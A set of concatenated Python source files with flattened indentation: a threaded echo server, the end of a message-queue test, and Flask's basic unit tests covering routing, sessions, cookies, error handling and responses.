putter = threading.Thread(target=put)
consumer = threading.Thread(target=consume)
putter.start()
consumer.start()
for thread in [putter, consumer]:
thread.join()
self.assertEqual(msgs, ["message 0", "message 1", "message 2"])
def test_custom_serializer(self):
"""Test the use of a custom serializer and None as serializer."""
msg = "my message"
# Test using None:
self.queue.serializer = None
self.queue.put(msg)
self.assertEqual(self.queue.get(), msg)
self.queue.put({"a": 1})
self.assertEqual(self.queue.get(), "{'a': 1}") # Should be a string
# Test using DummySerializer:
self.queue.serializer = DummySerializer
self.queue.put(msg)
self.assertEqual(self.queue.get(), "foo")
if __name__ == "__main__":
unittest.main()
|
threadecho.py
|
# A simple echo server with threads
from socket import *
from threading import Thread
def echo_server(addr):
sock = socket(AF_INET, SOCK_STREAM)
    sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind(addr)
sock.listen(5)
while True:
client, addr = sock.accept()
Thread(target=echo_handler, args=(client, addr), daemon=True).start()
def echo_handler(client, addr):
print('Connection from', addr)
with client:
while True:
data = client.recv(10000)
if not data:
break
client.sendall(data)
print('Connection closed')
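# A minimal client sketch for exercising the server above (illustrative only;
# run it from another shell while the server is listening on port 25000):
#
#     from socket import socket, AF_INET, SOCK_STREAM
#     s = socket(AF_INET, SOCK_STREAM)
#     s.connect(('localhost', 25000))
#     s.sendall(b'hello')
#     assert s.recv(10000) == b'hello'   # the server echoes the bytes back
#     s.close()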
if __name__ == '__main__':
    echo_server(('', 25000))
|
test_basic.py
|
# -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: 2010 Pallets
:license: BSD-3-Clause
"""
import re
import time
import uuid
from datetime import datetime
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest, Forbidden, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
from flask._compat import text_type
def test_options_work(app, client):
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
rv = client.open('/', method='OPTIONS')
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
assert rv.data == b''
def test_options_on_multiple_rules(app, client):
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
@app.route('/', methods=['PUT'])
def index_put():
return 'Aha!'
rv = client.open('/', method='OPTIONS')
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST', 'PUT']
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return 'Hello World!'
index.provide_automatic_options = False
app.route('/')(index)
rv = app.test_client().open('/', method='OPTIONS')
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return 'Hello World!'
index2.provide_automatic_options = True
app.route('/', methods=['OPTIONS'])(index2)
rv = app.test_client().open('/', method='OPTIONS')
assert sorted(rv.allow) == ['OPTIONS']
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule('/', view_func=index, provide_automatic_options=False)
app.add_url_rule(
'/more', view_func=more, methods=['GET', 'POST'],
provide_automatic_options=False
)
assert client.get('/').data == b'GET'
rv = client.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD']
# Older versions of Werkzeug.test.Client don't have an options method
if hasattr(client, 'options'):
rv = client.options('/')
else:
rv = client.open('/', method='OPTIONS')
assert rv.status_code == 405
rv = client.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post('/more').data == b'POST'
assert client.get('/more').data == b'GET'
rv = client.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'POST']
if hasattr(client, 'options'):
rv = client.options('/more')
else:
rv = client.open('/more', method='OPTIONS')
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route('/')
def index():
return flask.request.method
@app.route('/more', methods=['GET', 'POST'])
def more():
return flask.request.method
assert client.get('/').data == b'GET'
rv = client.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS']
rv = client.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post('/more').data == b'POST'
assert client.get('/more').data == b'GET'
rv = client.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route('/', methods='GET POST')
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule('/', 'index', index)
app.add_url_rule('/more', 'more', more, methods=['GET', 'POST'])
    # Issue 1288: Test that automatic options are not added when a non-uppercase 'options' is given in methods
app.add_url_rule('/options', 'options', options, methods=['options'])
assert client.get('/').data == b'GET'
rv = client.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS']
rv = client.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post('/more').data == b'POST'
assert client.get('/more').data == b'GET'
rv = client.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
rv = client.open('/options', method='OPTIONS')
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
def bar():
return 'bar'
def index():
return 'index'
app.view_functions['bar'] = bar
app.view_functions['index'] = index
assert client.get('/foo/').data == b'index'
assert client.get('/foo/bar').data == b'bar'
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
@app.endpoint('bar')
def bar():
return 'bar'
@app.endpoint('index')
def index():
return 'index'
assert client.get('/foo/').data == b'index'
assert client.get('/foo/bar').data == b'bar'
def test_session(app, client):
@app.route('/set', methods=['POST'])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session['value'] = flask.request.form['value']
assert flask.session.accessed
assert flask.session.modified
return 'value set'
@app.route('/get')
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get('value', 'None')
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post('/set', data={'value': '42'}).data == b'value set'
assert client.get('/get').data == b'42'
def test_session_using_server_name(app, client):
app.config.update(
SERVER_NAME='example.com'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://example.com/')
assert 'domain=.example.com' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(
SERVER_NAME='example.com:8080'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://example.com:8080/')
assert 'domain=.example.com' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(
SERVER_NAME='example.com:8080',
APPLICATION_ROOT='/foo'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://example.com:8080/foo')
assert 'domain=example.com' in rv.headers['set-cookie'].lower()
assert 'path=/foo' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, '/bar')
app.config.update(
APPLICATION_ROOT='/bar'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://example.com:8080/')
assert 'path=/bar' in rv.headers['set-cookie'].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME='www.example.com:8080',
APPLICATION_ROOT='/test',
SESSION_COOKIE_DOMAIN='.example.com',
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE='Lax',
SESSION_COOKIE_PATH='/'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = client.get('/', 'http://www.example.com:8080/test/')
cookie = rv.headers['set-cookie'].lower()
assert 'domain=.example.com' in cookie
assert 'path=/' in cookie
assert 'secure' in cookie
assert 'httponly' not in cookie
assert 'samesite' in cookie
def test_session_using_samesite_attribute(app, client):
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
app.config.update(SESSION_COOKIE_SAMESITE='invalid')
with pytest.raises(ValueError):
client.get('/')
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get('/')
cookie = rv.headers['set-cookie'].lower()
assert 'samesite' not in cookie
app.config.update(SESSION_COOKIE_SAMESITE='Strict')
rv = client.get('/')
cookie = rv.headers['set-cookie'].lower()
assert 'samesite=strict' in cookie
app.config.update(SESSION_COOKIE_SAMESITE='Lax')
rv = client.get('/')
cookie = rv.headers['set-cookie'].lower()
assert 'samesite=lax' in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(
SERVER_NAME='localhost:5000',
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'testing'
rv = client.get('/', 'http://localhost:5000/')
assert 'domain' not in rv.headers['set-cookie'].lower()
w = recwarn.pop(UserWarning)
assert '"localhost" is not a valid cookie domain' in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(
SERVER_NAME='127.0.0.1:5000',
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'testing'
rv = client.get('/', 'http://127.0.0.1:5000/')
assert 'domain=127.0.0.1' in rv.headers['set-cookie'].lower()
w = recwarn.pop(UserWarning)
assert 'cookie domain is an IP' in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and 'session is unavailable' in e.value.args[0]
with app.test_request_context():
assert flask.session.get('missing_key') is None
expect_exception(flask.session.__setitem__, 'foo', 42)
expect_exception(flask.session.pop, 'foo')
def test_session_expiration(app, client):
permanent = True
@app.route('/')
def index():
flask.session['test'] = 42
flask.session.permanent = permanent
return ''
@app.route('/test')
def test():
return text_type(flask.session.permanent)
rv = client.get('/')
assert 'set-cookie' in rv.headers
match = re.search(r'(?i)\bexpires=([^;]+)', rv.headers['set-cookie'])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get('/test')
assert rv.data == b'True'
permanent = False
rv = client.get('/')
assert 'set-cookie' in rv.headers
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session['foo'] = 42
return response
@app.route('/')
def dump_session_contents():
return repr(flask.session.get('foo'))
assert client.get('/').data == b'None'
assert client.get('/').data == b'42'
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route('/')
def dump_session_contents():
flask.session['t'] = (1, 2, 3)
flask.session['b'] = b'\xff'
flask.session['m'] = flask.Markup('<html>')
flask.session['u'] = the_uuid
flask.session['d'] = now
flask.session['t_tag'] = {' t': 'not-a-tuple'}
flask.session['di_t_tag'] = {' t__': 'not-a-tuple'}
flask.session['di_tag'] = {' di': 'not-a-dict'}
return '', 204
with client:
client.get('/')
s = flask.session
assert s['t'] == (1, 2, 3)
assert type(s['b']) == bytes
assert s['b'] == b'\xff'
assert type(s['m']) == flask.Markup
assert s['m'] == flask.Markup('<html>')
assert s['u'] == the_uuid
assert s['d'] == now
assert s['t_tag'] == {' t': 'not-a-tuple'}
assert s['di_t_tag'] == {' t__': 'not-a-tuple'}
assert s['di_tag'] == {' di': 'not-a-dict'}
def test_session_cookie_setting(app):
is_permanent = True
@app.route('/bump')
def bump():
rv = flask.session['foo'] = flask.session.get('foo', 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route('/read')
def read():
return str(flask.session.get('foo', 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get('/bump').data == b'1'
assert c.get('/bump').data == b'2'
assert c.get('/bump').data == b'3'
rv = c.get('/read')
set_cookie = rv.headers.get('set-cookie')
assert (set_cookie is not None) == expect_header
assert rv.data == b'3'
is_permanent = True
app.config['SESSION_REFRESH_EACH_REQUEST'] = True
run_test(expect_header=True)
is_permanent = True
app.config['SESSION_REFRESH_EACH_REQUEST'] = False
run_test(expect_header=False)
is_permanent = False
app.config['SESSION_REFRESH_EACH_REQUEST'] = True
run_test(expect_header=False)
is_permanent = False
app.config['SESSION_REFRESH_EACH_REQUEST'] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route('/set')
def set_session():
flask.session['test'] = 'test'
return ''
@app.route('/get')
def get():
return flask.session.get('test')
@app.route('/getitem')
def getitem():
return flask.session['test']
@app.route('/setdefault')
def setdefault():
return flask.session.setdefault('test', 'default')
@app.route('/vary-cookie-header-set')
def vary_cookie_header_set():
response = flask.Response()
response.vary.add('Cookie')
flask.session['test'] = 'test'
return response
@app.route('/vary-header-set')
def vary_header_set():
response = flask.Response()
response.vary.update(('Accept-Encoding', 'Accept-Language'))
flask.session['test'] = 'test'
return response
@app.route('/no-vary-header')
def no_vary_header():
return ''
def expect(path, header_value='Cookie'):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all('Vary')) == 1
assert rv.headers['Vary'] == header_value
else:
assert 'Vary' not in rv.headers
expect('/set')
expect('/get')
expect('/getitem')
expect('/setdefault')
expect('/vary-cookie-header-set')
expect('/vary-header-set', 'Accept-Encoding, Accept-Language, Cookie')
expect('/no-vary-header', None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash('Zap')
flask.session.modified = False
flask.flash('Zip')
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ['Zap', 'Zip']
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route('/')
def index():
flask.flash(u'Hello World')
flask.flash(u'Hello World', 'error')
flask.flash(flask.Markup(u'<em>Testing</em>'), 'warning')
return ''
@app.route('/test/')
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u'Hello World',
u'Hello World',
flask.Markup(u'<em>Testing</em>')
]
return ''
@app.route('/test_with_categories/')
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
('message', u'Hello World'),
('error', u'Hello World'),
('warning', flask.Markup(u'<em>Testing</em>'))
]
return ''
@app.route('/test_filter/')
def test_filter():
messages = flask.get_flashed_messages(
category_filter=['message'], with_categories=True)
assert list(messages) == [('message', u'Hello World')]
return ''
@app.route('/test_filters/')
def test_filters():
messages = flask.get_flashed_messages(
category_filter=['message', 'warning'], with_categories=True)
assert list(messages) == [
('message', u'Hello World'),
('warning', flask.Markup(u'<em>Testing</em>'))
]
return ''
@app.route('/test_filters_without_returning_categories/')
def test_filters2():
messages = flask.get_flashed_messages(
category_filter=['message', 'warning'])
assert len(messages) == 2
assert messages[0] == u'Hello World'
assert messages[1] == flask.Markup(u'<em>Testing</em>')
return ''
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get('/')
client.get('/test_with_categories/')
client = app.test_client()
client.get('/')
client.get('/test_filter/')
client = app.test_client()
client.get('/')
client.get('/test_filters/')
client = app.test_client()
client.get('/')
client.get('/test_filters_without_returning_categories/')
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append('before')
@app.after_request
def after_request(response):
response.data += b'|after'
evts.append('after')
return response
@app.route('/')
def index():
assert 'before' in evts
assert 'after' not in evts
return 'request'
assert 'after' not in evts
rv = client.get('/').data
assert 'after' in evts
assert rv == b'request|after'
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route('/')
def index():
evts.append('index')
return "damnit"
rv = client.get('/').data.strip()
assert rv == b'hello'
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route('/')
def index():
@flask.after_this_request
def foo(response):
response.headers['X-Foo'] = 'a header'
return response
return 'Test'
resp = client.get('/')
assert resp.status_code == 200
assert resp.headers['X-Foo'] == 'a header'
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = client.get('/')
assert rv.status_code == 200
assert b'Response' in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = client.get('/')
assert rv.status_code == 200
assert b'Response' in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route('/')
def fails():
1 // 0
rv = client.get('/')
assert rv.status_code == 500
assert b'Internal Server Error' in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route('/')
def index():
return '42'
rv = client.get('/')
assert rv.data == b'42'
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return 'not found', 404
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.errorhandler(Forbidden)
def forbidden(e):
return 'forbidden', 403
@app.route('/')
def index():
flask.abort(404)
@app.route('/error')
def error():
1 // 0
@app.route('/forbidden')
def error2():
flask.abort(403)
rv = client.get('/')
assert rv.status_code == 404
assert rv.data == b'not found'
rv = client.get('/error')
assert rv.status_code == 500
assert b'internal server error' == rv.data
rv = client.get('/forbidden')
assert rv.status_code == 403
assert b'forbidden' == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ('999', 999))
assert 'Use a subclass' in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.route('/')
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = 'text/x-special'
return resp
resp = client.get('/')
assert resp.mimetype == 'text/x-special'
assert resp.data == b'internal server error'
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route('/')
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get('/')
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = 'value'
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get('/')
assert rv.status_code == 404
assert rv.data == b'value'
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return '42'
@app.route('/')
def index():
raise MyException()
assert client.get('/').data == b'42'
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return 'banana'
@app.errorhandler(403)
def handle_forbidden_subclass(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return 'apple'
@app.route('/1')
def index1():
raise ForbiddenSubclass()
@app.route('/2')
def index2():
flask.abort(403)
@app.route('/3')
def index3():
raise Forbidden()
assert client.get('/1').data == b'banana'
assert client.get('/2').data == b'apple'
assert client.get('/3').data == b'apple'
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return 'E2'
@app.errorhandler(Exception)
def handle_exception(e):
return 'Exception'
@app.route('/E1')
def raise_e1():
raise E1
@app.route('/E3')
def raise_e3():
raise E3
rv = client.get('/E1')
assert rv.data == b'Exception'
rv = client.get('/E3')
assert rv.data == b'E2'
def test_trapping_of_bad_request_key_errors(app, client):
@app.route('/key')
def fail():
flask.request.form['missing_key']
@app.route('/abort')
def allow_abort():
flask.abort(400)
rv = client.get('/key')
assert rv.status_code == 400
assert b'missing_key' not in rv.data
rv = client.get('/abort')
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert 'missing_key' in e.value.get_description()
rv = client.get('/abort')
assert rv.status_code == 400
app.debug = False
app.config['TRAP_BAD_REQUEST_ERRORS'] = True
with pytest.raises(KeyError):
client.get('/key')
with pytest.raises(BadRequest):
client.get('/abort')
def test_trapping_of_all_http_exceptions(app, client):
app.config['TRAP_HTTP_EXCEPTIONS'] = True
@app.route('/fail')
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get('/fail')
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if trigger == 'before':
1 // 0
@app.after_request
def after_request(response):
if trigger == 'after':
1 // 0
return response
@app.route('/')
def index():
return 'Foo'
@app.errorhandler(500)
def internal_server_error(e):
return 'Hello Server Error', 500
for trigger in 'before', 'after':
rv = client.get('/')
assert rv.status_code == 500
assert rv.data == b'Hello Server Error'
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route('/fail', methods=['POST'])
def index():
return flask.request.files['foo'].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post('/fail', data={'foo': 'index.txt'})
assert 'no file contents were transmitted' in str(e.value)
assert 'This was submitted: "index.txt"' in str(e.value)
def test_response_types(app, client):
@app.route('/text')
def from_text():
return u'Hällo Wörld'
@app.route('/bytes')
def from_bytes():
return u'Hällo Wörld'.encode('utf-8')
@app.route('/full_tuple')
def from_full_tuple():
return 'Meh', 400, {
'X-Foo': 'Testing',
'Content-Type': 'text/plain; charset=utf-8'
}
@app.route('/text_headers')
def from_text_headers():
return 'Hello', {
'X-Foo': 'Test',
'Content-Type': 'text/plain; charset=utf-8'
}
@app.route('/text_status')
def from_text_status():
return 'Hi, status!', 400
@app.route('/response_headers')
def from_response_headers():
return flask.Response('Hello world', 404, {'X-Foo': 'Baz'}), {
"X-Foo": "Bar",
"X-Bar": "Foo"
}
@app.route('/response_status')
def from_response_status():
return app.response_class('Hello world', 400), 500
@app.route('/wsgi')
def from_wsgi():
return NotFound()
assert client.get('/text').data == u'Hällo Wörld'.encode('utf-8')
assert client.get('/bytes').data == u'Hällo Wörld'.encode('utf-8')
rv = client.get('/full_tuple')
assert rv.data == b'Meh'
assert rv.headers['X-Foo'] == 'Testing'
assert rv.status_code == 400
assert rv.mimetype == 'text/plain'
rv = client.get('/text_headers')
assert rv.data == b'Hello'
assert rv.headers['X-Foo'] == 'Test'
assert rv.status_code == 200
assert rv.mimetype == 'text/plain'
rv = client.get('/text_status')
assert rv.data == b'Hi, status!'
assert rv.status_code == 400
assert rv.mimetype == 'text/html'
rv = client.get('/response_headers')
assert rv.data == b'Hello world'
assert rv.headers.getlist('X-Foo') == ['Baz', 'Bar']
assert rv.headers['X-Bar'] == 'Foo'
assert rv.status_code == 404
rv = client.get('/response_status')
assert rv.data == b'Hello world'
assert rv.status_code == 500
rv = client.get('/wsgi')
assert b'Not Found' in rv.data
assert rv.status_code == 404
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route('/none')
def from_none():
pass
@app.route('/small_tuple')
def from_small_tuple():
return 'Hello',
@app.route('/large_tuple')
def from_large_tuple():
return 'Hello', 234, {'X-Foo': 'Bar'}, '???'
@app.route('/bad_type')
def from_bad_type():
return True
@app.route('/bad_wsgi')
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get('/none')
assert 'returned None' in str(e.value)
with pytest.raises(TypeError) as e:
c.get('/small_tuple')
assert 'tuple must have the form' in str(e.value)
pytest.raises(TypeError, c.get, '/large_tuple')
with pytest.raises(TypeError) as e:
c.get('/bad_type')
assert 'it was a bool' in str(e.value)
pytest.raises(TypeError, c.get, '/bad_wsgi')
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b''
assert rv.mimetype == 'text/html'
rv = flask.make_response('Awesome')
assert rv.status_code == 200
assert rv.data == b'Awesome'
assert rv.mimetype == 'text/html'
rv = flask.make_response('W00t', 404)
assert rv.status_code == 404
assert rv.data == b'W00t'
assert rv.mimetype == 'text/html'
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(
flask.jsonify({'msg': 'W00t'}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == 'application/json'
rv = flask.make_response(
flask.Response(''), 400)
assert rv.status_code == 400
assert rv.data == b''
assert rv.mimetype == 'text/html'
rv = flask.make_response(
flask.Response('', headers={'Content-Type': 'text/html'}),
400, [('X-Foo', 'bar')])
assert rv.status_code == 400
assert rv.headers['Content-Type'] == 'text/html'
assert rv.headers['X-Foo'] == 'bar'
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {
"msg": {
"submsg": "W00t"
},
"msg2": "foobar"
}
rv = flask.make_response(
flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = \
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
rv = flask.make_response(
flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": 'application/vnd.api+json'})
msg = {
"msg": {"submsg": "W00t"},
}
rv = flask.make_response(
flask.jsonify(msg), 200)
assert rv.mimetype == 'application/vnd.api+json'
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify('fake args', kwargs='fake')
assert 'behavior undefined' in str(e.value)
def test_url_generation(app, req_ctx):
@app.route('/hello/<name>', methods=['POST'])
def hello():
pass
assert flask.url_for('hello', name='test x') == '/hello/test%20x'
assert flask.url_for('hello', name='test x', _external=True) == \
'http://localhost/hello/test%20x'
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, 'spam')
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for('spam')
except BuildError as err:
error = err
try:
raise RuntimeError('Test case where BuildError is not current.')
except RuntimeError:
pytest.raises(
BuildError, app.handle_url_build_error, error, 'spam', {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return '/test_handler/'
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for('spam') == '/test_handler/'
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, 'not.existing')
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
'_external': False,
'_anchor': None,
'_method': None,
'_scheme': None,
}
return 'handled'
with app.test_request_context():
flask.url_for('/')
def test_custom_converters(app, client):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(',')
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ','.join(base_to_url(x) for x in value)
app.url_map.converters['list'] = ListConverter
@app.route('/<list:args>')
def index(args):
return '|'.join(args)
assert client.get('/1,2,3').data == b'1|2|3'
def test_static_files(app, client):
rv = client.get('/static/index.html')
assert rv.status_code == 200
assert rv.data.strip() == b'<h1>Hello World!</h1>'
with app.test_request_context():
assert flask.url_for('static', filename='index.html') == \
'/static/index.html'
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path='/foo')
app.testing = True
rv = app.test_client().get('/foo/index.html')
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for('static', filename='index.html') == '/foo/index.html'
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host='example.com')
c = app.test_client()
rv = c.get('http://example.com/static/index.html')
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for('static', filename='index.html', _external=True)
assert rv == 'http://example.com/static/index.html'
